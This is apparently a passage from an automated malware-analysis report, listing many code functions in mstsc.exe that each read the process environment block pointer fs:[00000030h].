Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B84015 mov eax, dword ptr fs:[00000030h]	21_2_04B84015
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]	21_2_04B71C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]	21_2_04B8740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]	21_2_04B8740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]	21_2_04B8740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]	21_2_04B36C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]	21_2_04B36C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]	21_2_04B36C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]	21_2_04B36C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD746D mov eax, dword ptr fs:[00000030h]	21_2_04AD746D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B72073 mov eax, dword ptr fs:[00000030h]	21_2_04B72073
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B81074 mov eax, dword ptr fs:[00000030h]	21_2_04B81074
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4C450 mov eax, dword ptr fs:[00000030h]	21_2_04B4C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4C450 mov eax, dword ptr fs:[00000030h]	21_2_04B4C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA44B mov eax, dword ptr fs:[00000030h]	21_2_04AEA44B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD0050 mov eax, dword ptr fs:[00000030h]	21_2_04AD0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD0050 mov eax, dword ptr fs:[00000030h]	21_2_04AD0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]	21_2_04B351BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]	21_2_04B351BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]	21_2_04B351BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]	21_2_04B351BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE61A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE61A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE35A1 mov eax, dword ptr fs:[00000030h]	21_2_04AE35A1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B805AC mov eax, dword ptr fs:[00000030h]	21_2_04B805AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B805AC mov eax, dword ptr fs:[00000030h]	21_2_04B805AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B369A6 mov eax, dword ptr fs:[00000030h]	21_2_04B369A6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]	21_2_04AE1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]	21_2_04AE1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]	21_2_04AE1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]	21_2_04AB2D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]	21_2_04AB2D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]	21_2_04AB2D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]	21_2_04AB2D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]	21_2_04AB2D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA185 mov eax, dword ptr fs:[00000030h]	21_2_04AEA185
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADC182 mov eax, dword ptr fs:[00000030h]	21_2_04ADC182
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]	21_2_04AE2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]	21_2_04AE2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]	21_2_04AE2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]	21_2_04AE2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEFD9B mov eax, dword ptr fs:[00000030h]	21_2_04AEFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEFD9B mov eax, dword ptr fs:[00000030h]	21_2_04AEFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2990 mov eax, dword ptr fs:[00000030h]	21_2_04AE2990
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B68DF1 mov eax, dword ptr fs:[00000030h]	21_2_04B68DF1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]	21_2_04ABB1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]	21_2_04ABB1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]	21_2_04ABB1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]	21_2_04ACD5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]	21_2_04ACD5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B441E8 mov eax, dword ptr fs:[00000030h]	21_2_04B441E8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov ecx, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]	21_2_04B36DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B3A537 mov eax, dword ptr fs:[00000030h]	21_2_04B3A537
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88D34 mov eax, dword ptr fs:[00000030h]	21_2_04B88D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120 mov ecx, dword ptr fs:[00000030h]	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE513A mov eax, dword ptr fs:[00000030h]	21_2_04AE513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE513A mov eax, dword ptr fs:[00000030h]	21_2_04AE513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]	21_2_04AE4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]	21_2_04AE4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]	21_2_04AE4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]	21_2_04AC3D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABAD30 mov eax, dword ptr fs:[00000030h]	21_2_04ABAD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]	21_2_04AB9100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]	21_2_04AB9100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]	21_2_04AB9100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABC962 mov eax, dword ptr fs:[00000030h]	21_2_04ABC962
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABB171 mov eax, dword ptr fs:[00000030h]	21_2_04ABB171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABB171 mov eax, dword ptr fs:[00000030h]	21_2_04ABB171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADC577 mov eax, dword ptr fs:[00000030h]	21_2_04ADC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADC577 mov eax, dword ptr fs:[00000030h]	21_2_04ADC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADB944 mov eax, dword ptr fs:[00000030h]	21_2_04ADB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADB944 mov eax, dword ptr fs:[00000030h]	21_2_04ADB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF3D43 mov eax, dword ptr fs:[00000030h]	21_2_04AF3D43
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B33540 mov eax, dword ptr fs:[00000030h]	21_2_04B33540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD7D50 mov eax, dword ptr fs:[00000030h]	21_2_04AD7D50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]	21_2_04AB52A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]	21_2_04AB52A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]	21_2_04AB52A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]	21_2_04AB52A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]	21_2_04AB52A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B346A7 mov eax, dword ptr fs:[00000030h]	21_2_04B346A7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACAAB0 mov eax, dword ptr fs:[00000030h]	21_2_04ACAAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACAAB0 mov eax, dword ptr fs:[00000030h]	21_2_04ACAAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]	21_2_04B80EA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]	21_2_04B80EA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]	21_2_04B80EA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEFAB0 mov eax, dword ptr fs:[00000030h]	21_2_04AEFAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4FE87 mov eax, dword ptr fs:[00000030h]	21_2_04B4FE87
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AED294 mov eax, dword ptr fs:[00000030h]	21_2_04AED294
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AED294 mov eax, dword ptr fs:[00000030h]	21_2_04AED294
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2AE4 mov eax, dword ptr fs:[00000030h]	21_2_04AE2AE4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE16E0 mov ecx, dword ptr fs:[00000030h]	21_2_04AE16E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC76E2 mov eax, dword ptr fs:[00000030h]	21_2_04AC76E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE36CC mov eax, dword ptr fs:[00000030h]	21_2_04AE36CC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2ACB mov eax, dword ptr fs:[00000030h]	21_2_04AE2ACB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF8EC7 mov eax, dword ptr fs:[00000030h]	21_2_04AF8EC7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88ED6 mov eax, dword ptr fs:[00000030h]	21_2_04B88ED6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B6FEC0 mov eax, dword ptr fs:[00000030h]	21_2_04B6FEC0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF4A2C mov eax, dword ptr fs:[00000030h]	21_2_04AF4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF4A2C mov eax, dword ptr fs:[00000030h]	21_2_04AF4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B6FE3F mov eax, dword ptr fs:[00000030h]	21_2_04B6FE3F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABE620 mov eax, dword ptr fs:[00000030h]	21_2_04ABE620
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC8A0A mov eax, dword ptr fs:[00000030h]	21_2_04AC8A0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]	21_2_04ABC600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]	21_2_04ABC600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]	21_2_04ABC600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE8E00 mov eax, dword ptr fs:[00000030h]	21_2_04AE8E00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD3A1C mov eax, dword ptr fs:[00000030h]	21_2_04AD3A1C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA61C mov eax, dword ptr fs:[00000030h]	21_2_04AEA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA61C mov eax, dword ptr fs:[00000030h]	21_2_04AEA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]	21_2_04AB5210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB5210 mov ecx, dword ptr fs:[00000030h]	21_2_04AB5210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]	21_2_04AB5210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]	21_2_04AB5210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABAA16 mov eax, dword ptr fs:[00000030h]	21_2_04ABAA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABAA16 mov eax, dword ptr fs:[00000030h]	21_2_04ABAA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71608 mov eax, dword ptr fs:[00000030h]	21_2_04B71608
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC766D mov eax, dword ptr fs:[00000030h]	21_2_04AC766D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF927A mov eax, dword ptr fs:[00000030h]	21_2_04AF927A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B6B260 mov eax, dword ptr fs:[00000030h]	21_2_04B6B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B6B260 mov eax, dword ptr fs:[00000030h]	21_2_04B6B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88A62 mov eax, dword ptr fs:[00000030h]	21_2_04B88A62
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]	21_2_04ADAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]	21_2_04ADAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]	21_2_04ADAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]	21_2_04ADAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]	21_2_04ADAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B44257 mov eax, dword ptr fs:[00000030h]	21_2_04B44257
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]	21_2_04AB9240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]	21_2_04AB9240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]	21_2_04AB9240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]	21_2_04AB9240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]	21_2_04AC7E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]	21_2_04AE4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]	21_2_04AE4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]	21_2_04AE4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B85BA5 mov eax, dword ptr fs:[00000030h]	21_2_04B85BA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC1B8F mov eax, dword ptr fs:[00000030h]	21_2_04AC1B8F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC1B8F mov eax, dword ptr fs:[00000030h]	21_2_04AC1B8F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]	21_2_04B37794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]	21_2_04B37794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]	21_2_04B37794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B6D380 mov ecx, dword ptr fs:[00000030h]	21_2_04B6D380
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC8794 mov eax, dword ptr fs:[00000030h]	21_2_04AC8794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2397 mov eax, dword ptr fs:[00000030h]	21_2_04AE2397
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B7138A mov eax, dword ptr fs:[00000030h]	21_2_04B7138A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEB390 mov eax, dword ptr fs:[00000030h]	21_2_04AEB390
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADDBE9 mov eax, dword ptr fs:[00000030h]	21_2_04ADDBE9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]	21_2_04AE03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF37F5 mov eax, dword ptr fs:[00000030h]	21_2_04AF37F5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B353CA mov eax, dword ptr fs:[00000030h]	21_2_04B353CA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B353CA mov eax, dword ptr fs:[00000030h]	21_2_04B353CA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB4F2E mov eax, dword ptr fs:[00000030h]	21_2_04AB4F2E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB4F2E mov eax, dword ptr fs:[00000030h]	21_2_04AB4F2E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEE730 mov eax, dword ptr fs:[00000030h]	21_2_04AEE730
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA70E mov eax, dword ptr fs:[00000030h]	21_2_04AEA70E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEA70E mov eax, dword ptr fs:[00000030h]	21_2_04AEA70E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4FF10 mov eax, dword ptr fs:[00000030h]	21_2_04B4FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4FF10 mov eax, dword ptr fs:[00000030h]	21_2_04B4FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B7131B mov eax, dword ptr fs:[00000030h]	21_2_04B7131B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B8070D mov eax, dword ptr fs:[00000030h]	21_2_04B8070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B8070D mov eax, dword ptr fs:[00000030h]	21_2_04B8070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ADF716 mov eax, dword ptr fs:[00000030h]	21_2_04ADF716
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABDB60 mov ecx, dword ptr fs:[00000030h]	21_2_04ABDB60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACFF60 mov eax, dword ptr fs:[00000030h]	21_2_04ACFF60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88F6A mov eax, dword ptr fs:[00000030h]	21_2_04B88F6A
